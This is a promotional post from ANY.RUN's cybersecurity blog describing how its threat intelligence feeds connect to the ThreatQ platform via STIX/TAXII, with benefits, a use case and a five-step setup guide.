With STIX/TAXII support, TI Feeds can be made a part of SOCs’ security infrastructure without additional custom development or costs, helping them maximize the value of their existing ThreatQ setup. As a result, security teams can achieve: 

• Early Detection: IOCs added to TI Feeds as soon as they emerge from live sandbox analyses, enabling proactive identification of new threats in your SOC. 

• Expanded Threat Coverage: 99% unique indicators from global attacks 
(e.g., phishing, malware) provide visibility into threats traditional feeds miss. 

• Informed Response: Each IOC comes enriched with a link to a sandbox report, showing the full attack being detonated on a live system, providing SOCs with actionable context for fast mitigation. 

• Reduced Workload: Filtered for malicious alerts, cutting Tier 1 analysis time spent on false positives. 

How SOC Teams Can Use TI Feeds: Case Example 

Threat Intelligence Feeds improve and simplify the core operations of security teams, delivering measurable results. Here’s a possible case for using our fresh threat intelligence to spot and contain attacks: 

• Easy Setup for Fast IOC Delivery 
  Connect ANY.RUN’s TI Feeds to ThreatQ via STIX/TAXII in minutes. Choose hourly, daily, or custom schedules to get real-time IOCs from global incidents, keeping your SOC ahead of new threats. 

• Power SOC Analysis with Actionable Data 
  ANY.RUN’s TI Feeds flow into ThreatQ, providing fresh IOCs to analyze alerts, investigate incidents, or enrich SIEM/EDR systems. This speeds up threat detection and strengthens your defense strategy. 

• Streamline Response and Prevention 
  Use ANY.RUN’s IOCs in ThreatQ to automate threat blocking, isolate risks, or enhance playbooks and visualizations. SOC analysts and threat hunters can respond faster and prevent attacks, saving time and reducing breach risks. 

How to Implement  

The connector operates through the STIX/TAXII protocol, allowing clients to configure feed schedules within ThreatQ’s flexible options: hourly, every 6 hours, daily, bi-daily, bi-weekly, or monthly updates. 

ThreatQ leverages ANY.RUN data for real-time or scheduled analysis as a malicious indicator source for alert and incident investigation. With additional connectors, organizations can optionally forward intelligence to their SIEM/EDR systems. 

Workflow Capabilities 

Depending on configuration settings, the system supports: 

• Manual or automated response actions (isolation, blocking, escalation) 

• Investigation enrichment and new rule/playbook configuration 

• Advanced visualizations for analysts and threat hunters 

Quick Setup Guide with 5 Easy Steps: 

1. Open ThreatQ and click My Integrations in the Integrations tab. 

2. Click Add New Integration. 

3. Configure TAXII Connection: go to the tab Add New TAXII Feed, fill out the configuration form.

For detailed information, see ANY.RUN’s TAXII connection documentation.  

4. After adding the TAXII feed, click on the settings button in the created connector card. Set switch to Enabled, and you’re all set up. 

5. After finalizing the configuration, use the retrieved indicators to: 

• Export them to SIEM/SOAR to automate detection and blocking of threats 

• Prioritize high-risk threats to stay focused on the most critical incidents 

• Combine them with data from other sources to gain full visibility into attacks 

• Enrich and accelerate threat hunting and investigations with actionable intelligence 

• Launch playbooks for automated response to threats.  

About ANY.RUN  

ANY.RUN is trusted by more than 500,000 cybersecurity professionals and 15,000+ organizations across finance, healthcare, manufacturing, and other critical industries. Our platform helps security teams investigate threats faster and with more clarity.   

Speed up incident response with our Interactive Sandbox: analyze suspicious files in real time, observe behavior as it unfolds, and make faster, more informed decisions.   

Strengthen detection with Threat Intelligence Lookup and TI Feeds: give your team the context they need to stay ahead of today’s most advanced threats.   

Want to see it in action? Start your 14-day trial of ANY.RUN today →  

The post ANY.RUN & ThreatQ: Boost Detection Rate, Turbocharge Response Speed  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More